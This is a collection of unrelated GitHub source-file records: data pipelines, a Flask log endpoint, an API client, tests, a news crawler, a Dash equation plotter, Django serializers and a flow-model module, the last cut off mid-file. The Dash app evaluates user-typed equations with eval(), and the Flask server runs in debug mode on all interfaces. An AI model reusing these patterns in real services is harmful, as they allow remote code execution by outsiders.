beam.Pipeline(options=pipe_options)\n\ndl_pipe = (\n pipe\n | beam.io.ReadFromText('gs://input-beam/test.csv',skip_header_lines=1)\n | beam.Map(lambda x: x.split(','))\n | beam.Map(lambda x: (x[0],x[2]))\n | beam.combiners.Count.PerKey()\n | \"Transforming my data\" >> beam.Map(lambda x: to_dict(x)) # This name between \"\" will naming the items on the Dataflow Dag\n | \"Writing on BigQuery\" >> beam.io.WriteToBigQuery(table=TABLE\n ,schema=TABLE_SCHEMA\n ,write_disposition=beam.io.BigQueryDisposition.WRITE_APPEND\n ,create_disposition=beam.io.BigQueryDisposition.CREATE_IF_NEEDED\n ,custom_gcs_temp_location='gs://staging-beam-ap/temp')\n # | beam.Map(print)\n)\n\npipe.run()","repo_name":"bdkiqdd/Data_Engineer","sub_path":"Beam/BatchProjects/3-ToBigQuery/pipe.py","file_name":"pipe.py","file_ext":"py","file_size_in_byte":2048,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"30810018339","text":"from flask import Flask, request\nimport json\n\napp = Flask(__name__)\n\n@app.route('/log',methods=['POST'])\ndef index():\n body = request.form\n print(body[\"asctime\"], body['filename'], body['msg'])\n return \"\"\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port = 3000, debug=True)\n","repo_name":"AnsuFrancis/python-logging","sub_path":"http-server/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":287,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"43392549915","text":"import json\nimport urlparse\nimport uuid\n\nimport requests\n\n\nclass RhodeCodeAPI(object):\n \"\"\"\n Make generic calls to RCE API.\n\n To call any API method, instanciate the API with the URL of your\n RCE instance and your user token.\n Then use a method call with the name of your API method, and pass the\n correct parameters.\n\n Will return a dict with the response from the API call\n\n eg.:\n api = RhodeCodeAPI('http://my.rhodecode.com');\n response = api.comment_pull_request(\n repoid=args.repoid,\n pullrequestid=int(args.prid),\n message=args.message,\n status=args.status\n )\n if response['error']:\n raise Exception(resp['error'])\n else:\n print resp\n \"\"\"\n headers = {'content-type': 'application/json'}\n\n def __init__(self, instance_url, user_token):\n self.url = instance_url\n self.key = user_token\n\n def __getattr__(self, name):\n return lambda **kwargs: self._call(name, **kwargs)\n\n def _call(self, method, **kwargs):\n payload = {\n 'id': str(uuid.uuid4()),\n 'api_key': self.key,\n 'method': method,\n 'args': kwargs\n }\n url = urlparse.urljoin(self.url, '_admin/api')\n resp = requests.post(\n url, data=json.dumps(payload), headers=self.headers)\n\n if resp.ok:\n return resp.json()\n else:\n resp.raise_for_status()\n","repo_name":"rhodecode/rhodecode-enterprise-ce","sub_path":"scripts/rhodecode_api.py","file_name":"rhodecode_api.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"5"} +{"seq_id":"24936677718","text":"#\n\n'''\nMay,08, 2014\n@author Hideki Ikeda\nUnit test for the StockValue class in stock_value.py\n'''\n\nimport os\nimport sys\nfrom datetime import date, datetime, timedelta\nimport shutil\nimport unittest\nfrom sklearn import linear_model\n\nsys.path.append(os.path.join(os.path.abspath(os.path.dirname(__file__)), '..'))\nfrom chelmbigstock import stock_value\n\n\nclass TestStockValue(unittest.TestCase):\n \"\"\"\n Unit tests for the StockValue class\n StockValue uses the StockHist and LinearAdapter classes.\n Make sure these classes work before testing StockValue\n \"\"\"\n\n _test_data = [\n # [ symbol, start_date, end_date ]\n [ 'HPQ', date(1993, 6, 14), date(1993, 7, 19) ], # small data\n [ 'MSFT', None, None ] # large data\n ]\n\n @classmethod\n def setUpClass(cls):\n cls._my_path = os.path.abspath(os.path.dirname(__file__))\n cls._result_path = os.path.join(cls._my_path, 'result')\n cls._expected_path = os.path.join(cls._my_path, 'expected')\n os.mkdir(cls._result_path)\n stock_value.StockHist.default_path = cls._result_path\n cls._predictor = stock_value.LinearAdapter(linear_model.Ridge(alpha=0.1, fit_intercept=False))\n cls._comment = 'Ridge alpha=0.1'\n cls._histories = []\n for symbol, sdate, edate in cls._test_data:\n cls._histories.append(stock_value.StockHist(symbol, sdate, edate))\n\n @classmethod\n def tearDownClass(cls):\n shutil.rmtree(cls._result_path)\n\n def test_past(self):\n for hist in self._histories:\n stock = stock_value.StockValue(hist, self._predictor, self._comment)\n # test dates\n expected = hist.dates\n result = stock.past_dates\n self.assertEqual(expected, result)\n # test highs\n expected = hist.highs\n result = stock.past_highs\n self.assertEqual(expected, result)\n\n def test_comment(self):\n stock = stock_value.StockValue(self._histories[0], self._predictor, self._comment)\n self.assertEqual(self._comment, stock.comment)\n\n def test_future(self):\n future_dates = [ date.today() + timedelta(days=1), date.today() + timedelta(days=30) ]\n for hist in self._histories:\n stock = stock_value.StockValue(hist, self._predictor, self._comment)\n result = stock.future_highs(future_dates)\n self.assertEqual(len(future_dates), len(result))\n\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"mikec964/chelmbigstock","sub_path":"tests/stock_value_test.py","file_name":"stock_value_test.py","file_ext":"py","file_size_in_byte":2535,"program_lang":"python","lang":"en","doc_type":"code","stars":13,"dataset":"github-code","pt":"5"} +{"seq_id":"39445141797","text":"'''\nContraseñas! En general las contraseñas a crear deben cumplir reglas por\nseguridad para que sean válidas. Desarrolle un programa que ingrese\ncontraseñas hasta ingresar una contraseña vacía. A medida que se ingresan\nverifique e informe si cumple con las reglas:\n a. No puede comenzar con número.\n b. Debe contener al menos dos números. Contar la cantidad de numeros\n de una cadena mediante una función recursiva.\nResolver utilizando exclusivamente manejo de excepciones y estructura While-True,\ncreando una nueva excepción o generando una existente (ValueError) cuando no\ncumpla alguno de las dos reglas, mostrar mensaje aclaratorio correspondiente en\ncada caso\n'''\n\ndef cantidad_digitos(cadena, i=0):\n 'Devuelve cantidad de digitos en una cadena'\n empieza_numero = int(cadena[i].isdigit())\n if len(cadena[i:]) == 1:\n return empieza_numero\n else:\n return empieza_numero + cantidad_digitos(cadena, i+1)\n\ndef es_valida(cont):\n 'Si cont no es una contraseña valida, raise ValueError'\n if cont[0].isdigit():\n raise ValueError('La contraseña no debe comenzar con un numero.')\n if cantidad_digitos(cont) < 2:\n raise ValueError('La contraseña debe tener al menos dos numeros.')\n\ndef __main__():\n \n while True:\n try:\n cont = input('Ingrese una contraseña: ')\n if not cont:\n raise KeyboardInterrupt\n es_valida(cont)\n print('Es una buena contraseña')\n\n except ValueError as error:\n print(f'Contraseña invalida: {error}')\n except KeyboardInterrupt:\n break\n\nif __name__ == \"__main__\":\n __main__()","repo_name":"diegoasanch/Programacion-I-Trabajos-Practicos","sub_path":"Simulacro_2/EJ2.py","file_name":"EJ2.py","file_ext":"py","file_size_in_byte":1674,"program_lang":"python","lang":"es","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"41059639446","text":"\n# coding: utf-8\n\n# In[1]:\n\n\n#-*- coding: utf-8 -*-\n#using python3\nimport sys,requests\n\nfrom selenium import webdriver\nimport time, re\nfrom bs4 import BeautifulSoup\nfrom time import sleep\n\n\n# In[2]:\n\n\nchrome_path = \".\\chromedriver.exe\" #chromedriver.exe執行檔所存在的路徑\ndriver = webdriver.Chrome(chrome_path)\n\ndriver.implicitly_wait(10)\n\ndriver.get('https://udn.com/news/breaknews/1')\nsleep(0.1)\n\n\n# In[3]:\n\n\n###load上一次開始爬的新聞的相關資料\n\ntimestamp = []\ndate_last_time = ''\nurl__last_time = ''\nwith open(\"udn_news_timestamp.txt\") as f:\n\ttmp = []\n\tfor i in f.readlines():\n\t\ttmp.append(i.strip('\\n'))\n\tif len(tmp)>0:\n\t\tdate_last_time = tmp[0]\n\t\turl__last_time = tmp[1]\n\telse:\n\t\tdate_last_time = \"\"\n\t\turl__last_time = \"\"\n\t#print(date_last_time,time_last_time,url__last_time)\n\n\n# In[4]:\n\n\n'''#第一次 搜索列表\nlast_html_str=\"\"\nstart_height = 0\nend_height = driver.execute_script(\"return document.body.scrollHeight\")\nsleep(0.1)\nfor i in range(start_height,end_height,200):\n# print('\\r %d'%i)\n sys.stdout.write('\\r scrolling to height = '+str(i))\n driver.execute_script('window.scrollTo(0,'+str(i)+')')\n sleep(0.1)\n \nhtml_str = driver.page_source\n#這個type 是string, 記錄瀏覽器html5,當前所有內文\n \nsoup = BeautifulSoup(html_str, \"html.parser\")\nfor block in soup.select('.area_body')[1].select('h2 a'):\n print(\"%s %70s\"%(block.text,block['href']))\n print(\"\\n\")\n \n\n'''\n\n\n# In[ ]:\n\n\n\n \n\n\n# In[5]:\n\n\n'''#第二次 搜索列表\n#\n\n#不知道為什麼,如果要用以下版本的找按鈕並點擊,如果頁面轉到該按鈕更下方的地方\n#就會出現Message: unknown error: Element ... is not clickable at point 的error\n#即使使用driver.find_element_by_xpath('//*[@id=\"more\"]/div').click()以及sleep(5)也無效\n#但是如果滾輪滾到網頁最上方,再按按鈕,就有效了\ndriver.execute_script('window.scrollTo(0,0)')\nprint(driver.find_element_by_link_text(\"看更多內容\"))\ndriver.find_element_by_link_text(\"看更多內容\").click()\n\n\n#先睡一下,給他���新算一下參數,不然會拿到舊的scrollHeight\nsleep(2)\n\nlast_html_str = html_str\nstart_height = end_height\nend_height = driver.execute_script(\"return document.body.scrollHeight\")\n\nfor i in range(start_height,end_height,200):\n# print('\\r %d'%i)\n sys.stdout.write('\\r scrolling to height = '+str(i))\n driver.execute_script('window.scrollTo(0,'+str(i)+')')\n sleep(0.1)\n \n \n#這個type 是string, 記錄瀏覽器html5,當前所有內文\nhtml_str = driver.page_source\n\nprint(\"\\nend\")\n\nsoup1 = BeautifulSoup(last_html_str).select('.area_body')[1].select('h2 a')\nsoup2 = BeautifulSoup(html_str).select('.area_body')[1].select('h2 a')\n\nprint(len(soup1))\nprint(len(soup2))\n#print(soup1==soup2)\nprint(\"update %d news\" %(len(soup2)-len(soup1)))\n\nfor i in range(len(soup1),len(soup2)):\n print(soup2[i])\n print('\\n')\n\nsleep(1)'''\n\n\n# In[6]:\n\n\n#本格是組裝上面兩個格子的結果,來達成更新n次的效果\nn = 200\nlast_html_str=''\nhtml_str=''\nend_height = 0\ntotal_update_news_num = 0\nthe_news_links = []\nstop = False\n\n\n\n\nfor i in range(n):\n try:\n print(\"%dth time\"%i)\n\n #找\"看更多內容\"這個按鈕後,並且按下去\n driver.execute_script('window.scrollTo(0,0)')\n driver.find_element_by_link_text(\"看更多內容\").click()\n #先睡一下,給他重新算一下參數,不然會拿到舊的scrollHeight\n sleep(2)\n\n\n last_html_str = html_str\n start_height = end_height\n #滾滾輪到頁面最下方\n end_height = driver.execute_script(\"return document.body.scrollHeight\")\n sleep(2)\n '''\n for i in range(start_height,end_height,200):\n # print('\\r %d'%i)\n sys.stdout.write('\\r scrolling to height = '+str(i))\n driver.execute_script('window.scrollTo(0,'+str(i)+')')\n sleep(0.1)\n '''\n\n #這個type 是string, 記錄瀏覽器html5,當前所有內文\n #之所以會有last_news, 跟current_news是因為,要框選出 按下 \"看更多內容\" 後,新增的新聞\n html_str = driver.page_source\n\n print(\"\\nend\")\n try:\n last_news = BeautifulSoup(last_html_str).select('.area_body')[1].select('h2 a')\n except:\n last_news = []\n\n current_news = BeautifulSoup(html_str).select('.area_body')[1].select('h2 a')\n\n current_news_content = BeautifulSoup(html_str).select('.area_body')[1]\n\n\n# print(len(last_news))\n# print(len(current_news))\n #rint(soup1==soup2)\n# print(\"update %d news in this iteration\" %(len(current_news)-len(last_news)))\n \n\n\n\n for i in range(len(last_news),len(current_news)):\n print(i)\n\n #由於UDN 的即實新聞列表並沒有 年份,但它的新聞稿內部有年份\n #所以我嘗試進去每一個新聞取時間資料,速度會慢一些,但不會因為,跨到下一年而有一些bug\n res = BeautifulSoup(requests.get('https://udn.com' + current_news[i]['href']).text)\n date = res.select('div.story_bady_info_author')[0].select('span')[0].text\n print(date)\n\n title = current_news[i].text\n print(title)\n \n url = 'https://udn.com' + current_news[i]['href']\n print(url)\n \n print('\\n')\n \n \n #這邊是再比較date是不是比date_last_time的時間點來的後面\n #而剛剛好如果date比date_last_time的時間點來的後面,用一般字串比較的結果是相同的\n #而且如果date_last_time是空字串,又剛剛好可以使得 \"任意 date\" > date_last_time\n #可以做出 \"沒有上次的check point,把全部資料都爬過一遍的效果\"\n \n if date < date_last_time:\n print(\"The data is up to date!!!!\\nUpdate %d data this time\"%total_update_news_num)\n stop = True\n break\n elif date == date_last_time and url == url__last_time:\n print(\"The data is up to date!!!!\\nUpdate %d data this time\"%total_update_news_num)\n stop = True\n break\n \n total_update_news_num = total_update_news_num + 1\n \n #這邊寫要存的URL\n the_news_links.append([date,current_news[i].text,url])\n \n \n ###記錄這次的是從哪一個新聞開始爬起\n if len(timestamp) == 0 :\n timestamp.append(date)\n timestamp.append(url)\n \n \n \n if stop == True:\n break\n except Exception as e:\n print(e)\n #traceback.print_exc()\n print(\"tony log : I guess the crawler reach the end of news, and the '看更多內容' is disappear!!\")\n print(\"tony log : check it first, then check the error log\")\n stop = True\n\nsleep(1)\nprint(\"update %d news totally\"% total_update_news_num)\n\ndriver.close()\n\n\n# In[53]:\n\n#如果這次有更新的資料,就寫檔udn_news_links.txt udn_news_timestamp.txt\n#udn_news_links.txt存 url udn_news_timestamp.txt 存最後更新紀錄\nif len(the_news_links)>0:\n\n with open(\"udn_news_links.txt\",'w') as f:\n for i in the_news_links:\n# f.write(i[0])\n# f.write(i[1])\n f.write(i[2])\n f.write('\\n')\n\n with open(\"udn_news_timestamp.txt\",'w') as f:\n for i in timestamp:\n f.write(i)\n f.write('\\n')\n exit(0)\nelse:\n print(\"no update on udn_news_links\")\n exit(1)\n\n","repo_name":"tonyli0803/web-crawler","sub_path":"udn_crawler/1_get_urls/Search_udn_url_test_time.py","file_name":"Search_udn_url_test_time.py","file_ext":"py","file_size_in_byte":7725,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"73242662231","text":"import dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nfrom dash.dependencies import Input, Output, State\nimport plotly.graph_objects as go\nimport dash_bootstrap_components as dbc\nimport numpy as np\nimport pandas as pd\n\napp = dash.Dash(__name__, external_stylesheets = [dbc.themes.SUPERHERO])\nserver = app.server\n\ncolors = {\n 'background': '#1b2e41',\n 'text': 'lightblue'\n}\n\napp.layout = html.Div([\n html.Br(),\n dcc.Input(id = 'eq', value = 'x', type = 'text'),\n\n html.Br(),\n html.Br(),\n\n html.Div(id = 'output-graph'),\n\n html.Br(),\n html.P('Double click to switch between scales')], id = 'fallback')\n\n@app.callback(\n Output(component_id = 'output-graph', component_property = 'children'),\n [Input(component_id = 'eq', component_property = 'value')],\n)\n\ndef update(eq):\n equation = eq[:]\n eq = eq.replace('^', '**')\n y_range = dict(range = [-5, 5])\n x_range = dict(range = [-5, 5])\n\n\n if 'tan' in eq:\n eq = eq[:eq.find('tan'):] + 'np.' + eq[eq.find('tan'):]\n x = np.linspace(-4*np.pi, 4*np.pi, 99999)\n\n if 'sin' in eq:\n eq = eq[:eq.find('sin'):] + 'np.' + eq[eq.find('sin'):]\n x = np.linspace(-4*np.pi, 4*np.pi, 2200)\n\n if 'cos' in eq:\n eq = eq[:eq.find('cos'):] + 'np.' + eq[eq.find('cos'):]\n x = np.linspace(-4*np.pi, 4*np.pi, 2200)\n\n else:\n x = np.linspace(-50, 50, 5000)\n\n y = eval(eq)\n df = pd.DataFrame({\n 'x':x,\n 'y':y})\n\n fig = go.Figure(\n data = [go.Line(\n x = df['x'], y = df['y']\n )],\n layout = {\n \"autosize\":False,\n 'width':1420,\n 'height':675,\n 'title':equation,\n 'yaxis':y_range,\n 'xaxis':x_range,\n 'plot_bgcolor':colors['background'],\n 'paper_bgcolor': colors['background'],\n 'font_color':colors['text']\n } \n )\n \n \n fig.update_xaxes(showline=True, linewidth=2, linecolor='lightblue',\n showgrid = True, gridwidth = 1, gridcolor = '#545454',\n zeroline = True, zerolinewidth = 2, zerolinecolor = 'dimgray' )\n\n fig.update_yaxes(showline=True, linewidth=2, linecolor='lightblue',\n showgrid = True, gridwidth = 1, gridcolor = '#545454',\n zeroline = True, zerolinewidth = 2, zerolinecolor = 'dimgray' )\n\n\n return dcc.Graph(\n id = 'graph',\n figure=fig\n )\n\nif __name__ == '__main__':\n app.run_server()\n","repo_name":"YashKarthik/graphicallly","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":2839,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"5"} +{"seq_id":"38763059345","text":"try:\n\twith open(\"status.md\" , \"r\") as f:\n\t\ttext = f.readline()\n\t\tnum = [int(x) for x in text.split() if x.isdigit()][0]\n\t\tnum += 1\n\t\n\tif num<= 99999999999999999999999999999999:\n\t\twith open(\"status.md\" , 'w') as f:\n\t\t\tif num in range(16):\n\t\t\t\timg = \"![goal](PR.png)\"\n\t\t\telif num in range(128):\n\t\t\t\timg = \"![goal](PR.png)\"\n\t\t\telif num in range(9999):\n\t\t\t\timg = \"![goal](PR.png)\"\n\t\t\telse:\n\t\t\t\timg = \"![goal](PR.png)\"\n\t\t\t\n\t\t\tf.write(f\"{num} pull requests merged\")\n\t\t\tf.write(\"
    \")\n\t\t\tf.write(\"Currently:\")\n\t\t\tf.write(\"
    \")\n\t\t\tf.write(img)\nexcept:\n\twith open(\"status.md\" , \"w\") as f:\n\t\tf.write(\"1 pull request merged\")\n\t\tf.write(\"
    \")\n\t\tf.write(\"Currently:\")\n\t\tf.write(\"
    \")\n\t\tf.write(\"![goal](PR.png)\")\n","repo_name":"CY83R-3X71NC710N/PR-Dashboard","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":707,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"29"} +{"seq_id":"10199568819","text":"import users.serializers as users\r\nfrom django.db import transaction\r\nfrom drf_extra_fields.fields import Base64ImageField\r\nfrom recipes.models import Ingredient, IngredientInRecipe, Recipe, Tag\r\nfrom rest_framework import serializers, validators\r\nfrom rest_framework.serializers import BooleanField\r\n\r\n\r\nclass TagSerializer(serializers.ModelSerializer):\r\n\r\n class Meta:\r\n model = Tag\r\n fields = '__all__'\r\n\r\n\r\nclass IngredientSerializer(serializers.ModelSerializer):\r\n\r\n class Meta:\r\n model = Ingredient\r\n fields = ('__all__')\r\n\r\n\r\nclass ShortRecipeSerializer(serializers.ModelSerializer):\r\n\r\n class Meta:\r\n model = Recipe\r\n fields = ('id', 'name', 'image', 'cooking_time')\r\n\r\n\r\nclass IngredientInRecipeSerializer(serializers.ModelSerializer):\r\n id = serializers.ReadOnlyField(source='ingredient.id')\r\n name = serializers.ReadOnlyField(source='ingredient.name')\r\n measurement_unit = serializers.ReadOnlyField(\r\n source='ingredient.measurement_unit'\r\n )\r\n\r\n class Meta:\r\n model = IngredientInRecipe\r\n fields = ('id', 'name', 'measurement_unit', 'amount',)\r\n\r\n validators = (\r\n validators.UniqueTogetherValidator(\r\n queryset=IngredientInRecipe.objects.all(),\r\n fields=('ingredient', 'recipe')\r\n ),\r\n )\r\n\r\n def __str__(self):\r\n return f'{self.ingredient} in {self.recipe}'\r\n\r\n\r\nclass AddIngredientSerializer(serializers.ModelSerializer):\r\n id = serializers.PrimaryKeyRelatedField(queryset=Ingredient.objects.all())\r\n amount = serializers.IntegerField()\r\n\r\n class Meta:\r\n model = IngredientInRecipe\r\n fields = ('id', 'amount')\r\n\r\n\r\nclass RecipeSerializer(serializers.ModelSerializer):\r\n author = users.UserSerializer()\r\n tags = TagSerializer(read_only=True, many=True)\r\n ingredients = IngredientInRecipeSerializer(\r\n source='ingredient_in_recipe',\r\n read_only=True, many=True\r\n )\r\n image = Base64ImageField()\r\n is_favorited = BooleanField(read_only=True)\r\n is_in_shopping_cart = BooleanField(read_only=True)\r\n\r\n class Meta:\r\n model = Recipe\r\n fields = ('id', 'tags', 'author', 'ingredients',\r\n 'is_favorited', 'is_in_shopping_cart',\r\n 'name', 'image', 'text', 'cooking_time')\r\n\r\n\r\nclass CreateRecipeSerializer(serializers.ModelSerializer):\r\n image = Base64ImageField(max_length=None)\r\n ingredients = AddIngredientSerializer(many=True)\r\n tags = serializers.PrimaryKeyRelatedField(\r\n queryset=Tag.objects.all(), many=True\r\n )\r\n\r\n class Meta:\r\n model = Recipe\r\n fields = (\r\n 'tags',\r\n 'ingredients',\r\n 'name',\r\n 'image',\r\n 'text',\r\n 'cooking_time'\r\n )\r\n\r\n def to_representation(self, instance):\r\n serializer = RecipeSerializer(instance)\r\n return serializer.data\r\n\r\n def add_ingredients(self, ingredients, recipe):\r\n IngredientInRecipe.objects.bulk_create(\r\n [IngredientInRecipe(\r\n recipe=recipe,\r\n ingredient=ingredient.get('id'),\r\n amount=ingredient.get('amount'),\r\n ) for ingredient in ingredients]\r\n )\r\n\r\n @transaction.atomic\r\n def create(self, validated_data):\r\n ingredients = validated_data.pop('ingredients')\r\n tags = validated_data.pop('tags')\r\n recipe = Recipe.objects.create(**validated_data)\r\n recipe.tags.set(tags)\r\n recipe.save()\r\n self.add_ingredients(ingredients, recipe)\r\n return recipe\r\n\r\n @transaction.atomic\r\n def update(self, instance, validated_data):\r\n ingredients = validated_data.pop('ingredients')\r\n tags = validated_data.pop('tags')\r\n instance.ingredients.clear()\r\n self.add_ingredients(ingredients, instance)\r\n instance.tags.clear()\r\n instance.tags.set(tags)\r\n return super().update(instance, validated_data)\r\n\r\n def validate(self, validated_data):\r\n ingredients_data = validated_data['ingredients']\r\n if not ingredients_data:\r\n raise serializers.ValidationError(\r\n 'Поле с ингредиентами не может быть пустым'\r\n )\r\n for ingredient in ingredients_data:\r\n if int(ingredient.get('amount')) < 1:\r\n raise serializers.ValidationError(\r\n 'Количество ингредиента >= 1!')\r\n return validated_data\r\n\r\n def validate_cooking_time(self, cooking_time):\r\n if int(cooking_time) < 1:\r\n raise serializers.ValidationError(\r\n 'Время приготовления >= 1!')\r\n return cooking_time\r\n","repo_name":"iharwest/foodgram-project-react","sub_path":"backend/api/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":4775,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"287733717","text":"## Project: SpeckleDNet\n## Developer: Milad Shiri\n## @2020\n\nimport numpy as np\nfrom PIL import Image\n\n\ndef construct_input_data(xm, xc, y, main_dims, comp_dims):\n Xm = np.empty((len(xm),\n main_dims[0],\n main_dims[1],\n 1))\n Xc = np.empty((len(xc),\n comp_dims[0],\n comp_dims[1],\n 1))\n Y = np.empty((len(y),))\n\n for i, item in enumerate(list(zip(xm, xc, y))):\n xm_image = Image.fromarray(item[0])\n xc_image = Image.fromarray(item[1])\n Xm [i,:, :, 0] = np.array(xm_image.resize((main_dims[0],\n main_dims[1])))/255.0\n Xc [i,:, :, 0] = np.array(xc_image.resize((comp_dims[0],\n comp_dims[1])))/255.0\n Y [i] = item[2]\n return Xm, Xc, Y\n\n","repo_name":"miladshiri/specklednet","sub_path":"tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":885,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"29"} +{"seq_id":"28020845717","text":"#!/usr/bin/python3\n\n#AJMM\n#alberto.martin@umayor.cl\n#(proteinomano@gmail.com)\n\n\nfrom scipy.spatial.distance import pdist\nnames = []\nd = [[]]\n\nwith open ( \"Drosophila_melanogaster_genecount_v1.asci\" , 'r') as f :\n\tl = f.readline ()\n\tl = l.rstrip()\n\tnames = l.split(',')\n\td = [[] for y in range(len(names))]\n\tfor l in f :\n\t\tl = l.rstrip()\n\t\tt = l.split(',')\n\t\tfor i in range (len(names)):\n\t\t\t\n\t\t\td[i].append(int(t[i]))\n\ndd = pdist(d, 'correlation')\nc = 0\n\nfo = open ( \"coornet.tsv\" , 'w')\nfor i in range (len(names)):\n\tfor j in range (i+1,len(names)):\n\t\tfo.write(\"{}\\t{}\\t{:.4f}\\n\".format(names[i],names[j],1-dd[c]))\n\t\tc += 1\n\n\nfo.close()\n","repo_name":"networkbiolab/Network-Filtering","sub_path":"Analysis/docornet.py","file_name":"docornet.py","file_ext":"py","file_size_in_byte":637,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"71823688717","text":"# about transforms to datasets\n# if use builtin dataset, can pass in transform argument\n# pytorch has a lot of transforms already implemented\n# can see at https://pytorch.org/vision/stable/transforms.html\n# ex. transforms that can be applied to images or tensors, ones \n# that do conversions, generic transforms, etc.\n# can also compose a list transforms to do multiple transforms in a row\n\nimport torch\nimport torchvision\nfrom torch.utils.data import Dataset, DataLoader\nimport numpy as np\nimport math\n\n\n# extending WineDataset class to support transforms\nclass WineDataset(Dataset):\n\n # add optional transform parameter whose default it None\n def __init__(self, transform=None):\n xy = np.loadtxt('wine.csv', delimiter=',', dtype=np.float32, skiprows=1)\n \n # note that we do not convert to a tensor here\n self.x = xy[:, 1:]\n self.y = xy[:, [0]]\n self.n_samples = xy.shape[0]\n\n # add self.transform\n self.transform = transform\n \n def __getitem__(self, index):\n # apply transform if it's available\n sample = self.x[index], self.y[index]\n\n # if self.transform != None, then transform the sample\n if self.transform:\n sample = self.transform(sample)\n \n return sample\n \n def __len__(self):\n return self.n_samples\n\n\n# create custom transform classes\n# write our own ToTensor class\nclass ToTensor:\n # makes it a callable object, so can call ToTensor()\n def __call__(self, sample):\n # first unpack samples\n inputs, targets = sample\n # returns a tuple\n return torch.from_numpy(inputs), torch.from_numpy(targets)\n\n \ndataset = WineDataset(transform=ToTensor())\nfirst_data = dataset[0]\nfeatures, labels = first_data\nprint(features)\nprint(type(features), type(labels))\n# ^see that features and labels are now of type tensor,\n# whereas if pass None as transform argument then they\n# are of type numpy.ndarray\n\n# make a multiplication transform\nclass MultiplicationTransform:\n def __init__(self, factor):\n self.factor = factor\n\n def __call__(self, sample):\n inputs, target = sample\n inputs *= self.factor\n return inputs, target # as tuple\n\n# apply multiplication transform using a composed transform\n# Compose takes a list of transforms\ncomposed = torchvision.transforms.Compose([ToTensor(), MultiplicationTransform(4)])\ndataset = WineDataset(transform=composed)\nfirst_data = dataset[0]\nfeatures, labels = first_data\nprint(features)\nprint(type(features), type(labels))\n# ^here see that each item got multiplied by the\n# factor passed into the multiplication transform","repo_name":"chana-kaminsky/pytorch_tutorial","sub_path":"10 - Dataset Transforms.py","file_name":"10 - Dataset Transforms.py","file_ext":"py","file_size_in_byte":2657,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"29"} +{"seq_id":"38073776437","text":"import FrEIA.framework as Ff\nimport FrEIA.modules as Fm\nimport FrEIA as Fr\nimport numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom typing import Callable\nfrom scipy.stats import special_ortho_group\nfrom attn_modules.magicAttn_step import MagicISDP\nimport wandb\n\nclass MagicAttnBlock(Fm.AllInOneBlock): \n def __init__(self, dims_in, dims_c=[],\n subnet_constructor: Callable = None,\n affine_clamping: float = 2.,\n gin_block: bool = False,\n global_affine_init: float = 1.,\n global_affine_type: str = 'SOFTPLUS',\n permute_soft: bool = False,\n learned_householder_permutation: int = 0,\n reverse_permutation: bool = False,\n cfg = None,\n split_dim=1,\n n_head=1, is_multiHead=False):\n \n super(MagicAttnBlock, self).__init__(dims_in, dims_c, subnet_constructor)\n \n self.cfg = cfg\n self.MagicISDP = MagicISDP(dims_in[0][0], split_dim, n_head, is_multiHead, cfg)\n \n if self.cfg != None and self.cfg.use_wandb:\n wandb.init(project=self.cfg.wandb_project, name=self.cfg.wandb_table)\n\n\n def forward(self, x, c=[], rev=False, jac=True):\n '''See base class docstring'''\n #import pdb; pdb.set_trace()\n if self.householder:\n self.w_perm = self._construct_householder_permutation()\n if rev or self.reverse_pre_permute:\n self.w_perm_inv = self.w_perm.transpose(0, 1).contiguous()\n\n if rev:\n x, global_scaling_jac = self._permute(x[0], rev=True)\n x = (x,)\n elif self.reverse_pre_permute:\n x = (self._pre_permute(x[0], rev=False),)\n\n x1, x2 = torch.split(x[0], self.splits, dim=1)\n\n if self.conditional:\n x1c = torch.cat([x1, *c], 1)\n else:\n x1c = x1\n \n if not rev:\n a1 = self.subnet(x1c)\n x2, j2 = self._affine(x2, a1)\n else:\n a1 = self.subnet(x1c)\n x2, j2 = self._affine(x2, a1, rev=True)\n\n log_jac_det = j2\n x_out = torch.cat((x1, x2), 1)\n\n\n \"\"\"\n After Coupling block, applying MagicISDP\n \"\"\"\n if not rev:\n x_out, log_jac_det = self.MagicISDP(x_out, logdet=log_jac_det, reverse=False, permute=False)\n else:\n x_out, log_jac_det = self.MagicISDP(x_out, logdet=log_jac_det, reverse=True, permute=False)\n \n\n if not rev:\n x_out, global_scaling_jac = self._permute(x_out, rev=False)\n elif self.reverse_pre_permute:\n x_out = self._pre_permute(x_out, rev=True)\n\n \n # add the global scaling Jacobian to the total.\n # trick to get the total number of non-channel dimensions:\n # number of elements of the first channel of the first batch member\n n_pixels = x_out[0, :1].numel()\n log_jac_det += (-1)**rev * n_pixels * global_scaling_jac\n\n\n if self.cfg != None and self.cfg.use_wandb:\n wandb.log({'global_scale_logdet': torch.mean(global_scaling_jac), 'FlowStep_logdet': torch.mean(log_jac_det)})\n \n\n return (x_out,), log_jac_det\n\n# Flow level : [squeeze - actnorm - invertible 1x1 - affine coupling - invertible attention - split - 